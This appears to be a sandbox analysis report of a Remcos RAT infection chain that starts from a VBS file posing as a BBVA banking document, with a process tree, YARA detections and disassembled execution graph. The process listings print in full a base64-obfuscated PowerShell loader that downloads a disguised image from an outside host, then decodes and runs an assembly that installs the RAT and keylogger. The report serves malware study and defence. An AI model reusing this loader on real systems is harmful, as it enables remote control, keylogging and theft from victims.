                                                        Data Ascii: 5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+Mr


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:08:30:02
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs"
                                                        Imagebase:0x7ff6327e0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:08:30:06
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:08:30:06
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:08:30:34
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"
                                                        Imagebase:0x7ff66ede0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:08:30:34
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:08:30:36
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wscript.exe C:\ProgramData\haematachometer.vbs
                                                        Imagebase:0x7ff6327e0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:08:30:38
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                        Imagebase:0xaa0000
                                                        File size:56'368 bytes
                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:08:30:40
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:08:30:40
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:19
                                                        Start time:08:31:15
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs"
                                                        Imagebase:0x120000
                                                        File size:147'456 bytes
                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:20
                                                        Start time:08:31:15
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                        Imagebase:0x440000
                                                        File size:56'368 bytes
                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:21
                                                        Start time:08:31:15
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                        Imagebase:0xb40000
                                                        File size:56'368 bytes
                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.1%
                                                          Total number of Nodes:531
                                                          Total number of Limit Nodes:19
                                                          execution_graph 46808 4047eb WaitForSingleObject 46809 404805 SetEvent CloseHandle 46808->46809 46810 40481c closesocket 46808->46810 46811 40489c 46809->46811 46812 404829 46810->46812 46813 40483f 46812->46813 46821 404ab1 83 API calls 46812->46821 46815 404851 WaitForSingleObject 46813->46815 46816 404892 SetEvent CloseHandle 46813->46816 46822 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46815->46822 46816->46811 46818 404860 SetEvent WaitForSingleObject 46823 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46818->46823 46820 404878 SetEvent CloseHandle CloseHandle 46820->46816 46821->46813 46822->46818 46823->46820 46824 402bcc 46825 402bd7 46824->46825 46826 402bdf 46824->46826 46842 403315 28 API calls _Deallocate 46825->46842 46828 402beb 46826->46828 46832 4015d3 46826->46832 46829 402bdd 46836 43360d 46832->46836 46834 402be9 46836->46834 46838 43362e std::_Facet_Register 46836->46838 46843 43a88c 46836->46843 46850 442200 7 API calls 2 library calls 46836->46850 46837 433dec std::_Facet_Register 46852 437bd7 RaiseException 46837->46852 46838->46837 46851 437bd7 RaiseException 46838->46851 46840 433e09 46842->46829 46845 446aff _strftime 46843->46845 46844 446b3d 46854 445354 20 API calls __dosmaperr 46844->46854 46845->46844 46847 446b28 RtlAllocateHeap 46845->46847 46853 442200 7 API calls 2 library calls 46845->46853 46847->46845 46848 446b3b 46847->46848 46848->46836 46850->46836 46851->46837 46852->46840 46853->46845 46854->46848 46855 4339be 46856 4339ca ___scrt_is_nonwritable_in_current_image 46855->46856 46887 4336b3 46856->46887 46858 4339d1 46859 433b24 46858->46859 46862 4339fb 46858->46862 47183 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46859->47183 46861 433b2b 47174 4426be 46861->47174 46873 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46862->46873 47177 4434d1 5 API calls CatchGuardHandler 46862->47177 46867 433a14 46869 433a1a 46867->46869 47178 443475 5 API calls CatchGuardHandler 46867->47178 46871 433a9b 46898 433c5e 46871->46898 46873->46871 47179 43edf4 35 API calls 4 library calls 46873->47179 46881 433abd 46881->46861 46882 433ac1 46881->46882 46883 433aca 46882->46883 47181 442661 28 API calls _Atexit 46882->47181 47182 433842 13 API calls 2 library calls 46883->47182 46886 433ad2 46886->46869 46888 4336bc 46887->46888 47185 433e0a IsProcessorFeaturePresent 46888->47185 46890 4336c8 47186 4379ee 10 API calls 3 library calls 46890->47186 46892 4336cd 46893 4336d1 46892->46893 47187 44335e 46892->47187 46893->46858 46896 4336e8 46896->46858 47253 436050 46898->47253 46900 433c71 GetStartupInfoW 46901 433aa1 46900->46901 46902 443422 46901->46902 47254 44ddc9 46902->47254 46904 433aaa 46907 40d767 46904->46907 46905 44342b 46905->46904 47258 44e0d3 35 API calls 46905->47258 47260 41bce3 LoadLibraryA GetProcAddress 46907->47260 46909 40d783 GetModuleFileNameW 47265 40e168 46909->47265 46911 40d79f 47280 401fbd 46911->47280 46914 401fbd 28 API calls 46915 40d7bd 46914->46915 47284 41afc3 46915->47284 46919 40d7cf 47306 401d8c 11 API calls 46919->47306 46921 40d7d8 46922 40d835 46921->46922 46923 40d7eb 46921->46923 47307 401d64 22 API calls 46922->47307 47327 40e986 111 API calls 46923->47327 46926 40d845 47308 401d64 22 API calls 46926->47308 46927 40d7fd 47328 401d64 22 API calls 46927->47328 46930 40d864 47309 404cbf 28 API calls 46930->47309 46931 40d809 47329 40e937 65 API calls 46931->47329 46933 40d873 47310 405ce6 28 API calls 46933->47310 46936 40d87f 47311 401eef 46936->47311 46937 40d824 47330 40e155 65 API calls 46937->47330 46940 40d88b 47315 401eea 46940->47315 46942 40d894 46944 401eea 11 API calls 46942->46944 46943 401eea 11 API calls 46945 40dc9f 46943->46945 46946 40d89d 46944->46946 47180 433c94 GetModuleHandleW 46945->47180 47319 401d64 22 API calls 46946->47319 46948 40d8a6 47320 401ebd 28 API calls 46948->47320 46950 40d8b1 47321 401d64 22 API calls 46950->47321 46952 40d8ca 47322 401d64 22 API calls 46952->47322 46954 40d946 46971 40e134 46954->46971 47323 401d64 22 API calls 46954->47323 46955 40d8e5 46955->46954 47331 4085b4 28 API calls 46955->47331 46958 40d912 46959 401eef 11 API calls 46958->46959 46960 40d91e 46959->46960 46963 401eea 11 API calls 46960->46963 46961 40d9a4 47324 40bed7 46961->47324 46962 40d95d 46962->46961 47333 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 46962->47333 46965 40d927 46963->46965 47332 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 46965->47332 46966 40d9aa 46967 40d82d 46966->46967 47335 41a463 33 API calls 46966->47335 46967->46943 47421 412902 30 API calls 46971->47421 46972 40d9c5 46974 40da18 46972->46974 47336 40697b RegOpenKeyExA RegQueryValueExA RegCloseKey 46972->47336 46973 40d988 46973->46961 47334 412902 30 API calls 46973->47334 47341 401d64 22 API calls 46974->47341 46979 40da21 46988 40da32 46979->46988 46989 40da2d 46979->46989 46980 40d9e0 46982 40d9e4 46980->46982 46983 40d9ee 46980->46983 46981 40e14a 47422 4112b5 64 API calls ___scrt_fastfail 46981->47422 47337 40699d 30 API calls 46982->47337 47339 401d64 22 API calls 46983->47339 47343 401d64 22 API calls 46988->47343 47342 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46989->47342 46990 40d9e9 47338 4064d0 97 API calls 46990->47338 46994 40da3b 47344 41ae08 28 API calls 46994->47344 46996 40d9f7 46996->46974 46999 40da13 46996->46999 46997 40da46 47345 401e18 11 API calls 46997->47345 47340 4064d0 97 API calls 46999->47340 47000 40da51 47346 401e13 11 API calls 47000->47346 47003 40da5a 47347 401d64 22 API calls 47003->47347 47005 40da63 47348 401d64 22 API calls 47005->47348 47007 40da7d 47349 401d64 22 API calls 47007->47349 47009 40da97 47350 401d64 22 API calls 47009->47350 47011 40db22 47013 40db2c 47011->47013 47020 40dcaa ___scrt_fastfail 47011->47020 47012 40dab0 47012->47011 47351 401d64 22 API calls 47012->47351 47015 40db35 47013->47015 47021 40dbb1 47013->47021 47357 401d64 22 API calls 47015->47357 47017 40db3e 47358 401d64 22 API calls 47017->47358 47018 40dac5 _wcslen 47018->47011 47352 401d64 22 API calls 47018->47352 47368 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47020->47368 47045 40dbac ___scrt_fastfail 47021->47045 47023 40db50 47359 401d64 22 API calls 47023->47359 47024 40dae0 47353 401d64 22 API calls 47024->47353 47027 40db62 47360 401d64 22 API calls 47027->47360 47029 40daf5 47354 40c89e 31 API calls 47029->47354 47030 40dcef 47369 401d64 22 API calls 47030->47369 47033 40db8b 47361 401d64 22 API calls 47033->47361 47034 40dd16 47370 401f66 28 API calls 47034->47370 47036 40db08 47355 401e18 11 API calls 47036->47355 47038 40db14 47356 401e13 11 API calls 47038->47356 47042 40db9c 47362 40bc67 45 API calls _wcslen 47042->47362 47043 40dd25 47371 4126d2 14 API calls 47043->47371 47044 40db1d 47044->47011 47045->47021 47363 4128a2 31 API calls 47045->47363 47049 40dd3b 47372 401d64 22 API calls 47049->47372 47050 40dc45 ctype 47364 401d64 22 API calls 47050->47364 47052 40dd47 47373 43a5e7 39 API calls _strftime 47052->47373 47055 40dd54 47057 40dd81 47055->47057 47374 41beb0 86 API calls ___scrt_fastfail 47055->47374 47056 40dc5c 47056->47030 47365 401d64 22 API calls 47056->47365 47375 401f66 28 API calls 47057->47375 47060 40dc7e 47366 41ae08 28 API calls 47060->47366 47062 40dd65 CreateThread 47062->47057 47486 41c96f 10 API calls 47062->47486 47064 40dd96 47376 401f66 28 API calls 47064->47376 47065 40dc87 47367 40e219 109 API calls 47065->47367 47068 40dda5 47377 41a686 79 API calls 47068->47377 47069 40dc8c 47069->47030 47071 40dc93 47069->47071 47071->46967 47072 40ddaa 47378 401d64 22 API calls 47072->47378 47074 40ddb6 47379 401d64 22 API calls 47074->47379 47076 40ddcb 47380 401d64 22 API calls 47076->47380 47078 40ddeb 47381 43a5e7 39 API calls _strftime 47078->47381 47080 40ddf8 47382 401d64 22 API calls 47080->47382 47082 40de03 47383 401d64 22 API calls 47082->47383 47084 40de14 47384 401d64 22 API calls 47084->47384 47086 40de29 47385 401d64 22 API calls 47086->47385 47088 40de3a 47089 40de41 StrToIntA 47088->47089 47386 409517 141 API calls _wcslen 47089->47386 47091 40de53 47387 401d64 22 API calls 47091->47387 47093 40dea1 47390 401d64 22 API calls 47093->47390 47094 40de5c 47094->47093 47388 43360d 22 API calls 3 library calls 47094->47388 47097 40de71 47389 401d64 22 API calls 47097->47389 47099 40de84 47102 40de8b CreateThread 47099->47102 47100 40def9 47393 401d64 22 API calls 47100->47393 47101 40deb1 47101->47100 47391 43360d 22 API calls 3 library calls 47101->47391 47102->47093 47490 419128 102 API calls 2 library calls 47102->47490 47105 40dec6 47392 401d64 22 API calls 47105->47392 47107 40ded8 47112 40dedf CreateThread 47107->47112 47108 40df6c 47399 401d64 22 API calls 47108->47399 47109 40df02 47109->47108 47394 401d64 22 API calls 47109->47394 47112->47100 47487 419128 102 API calls 2 library calls 47112->47487 47113 40df1e 47395 401d64 22 API calls 47113->47395 47114 40df75 47115 40dfba 47114->47115 47400 401d64 22 API calls 47114->47400 47404 41a7a2 29 API calls 47115->47404 47119 40df33 47396 40c854 31 API calls 47119->47396 47120 40dfc3 47405 401e18 11 API calls 47120->47405 47121 40df8a 47401 401d64 22 API calls 47121->47401 47123 40dfce 47406 401e13 11 API calls 47123->47406 47127 40df46 47397 401e18 11 API calls 47127->47397 47128 40dfd7 CreateThread 47133 40e004 47128->47133 47134 40dff8 CreateThread 47128->47134 47488 40e54f 82 API calls 47128->47488 47129 40df9f 47402 43a5e7 39 API calls _strftime 47129->47402 47132 40df52 47398 401e13 11 API calls 47132->47398 47137 40e019 47133->47137 47138 40e00d CreateThread 47133->47138 47134->47133 47489 410f36 138 API calls 47134->47489 47136 40df5b CreateThread 47136->47108 47484 40196b 49 API calls _strftime 47136->47484 47141 40e073 47137->47141 47407 401f66 28 API calls 47137->47407 47138->47137 47485 411524 38 API calls ___scrt_fastfail 47138->47485 47140 40dfac 47403 40b95c 7 API calls 47140->47403 47411 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 47141->47411 47144 40e046 47408 404c9e 28 API calls 47144->47408 47147 40e08b 47149 40e12a 47147->47149 47412 41ae08 28 API calls 47147->47412 47148 40e053 47409 401f66 28 API calls 47148->47409 47419 40cbac 27 API calls 47149->47419 47152 40e062 47410 41a686 79 API calls 47152->47410 47154 40e0a4 47413 412584 31 API calls 47154->47413 47156 40e12f 47420 413fd4 168 API calls _strftime 47156->47420 47157 40e067 47159 401eea 11 API calls 47157->47159 47159->47141 47161 40e0ba 47414 401e13 11 API calls 47161->47414 47163 40e0ed DeleteFileW 47164 40e0f4 47163->47164 47165 40e0c5 47163->47165 47415 41ae08 28 API calls 47164->47415 47165->47163 47165->47164 47167 40e0db Sleep 47165->47167 47167->47165 47168 40e104 47416 41297a RegOpenKeyExW RegDeleteValueW 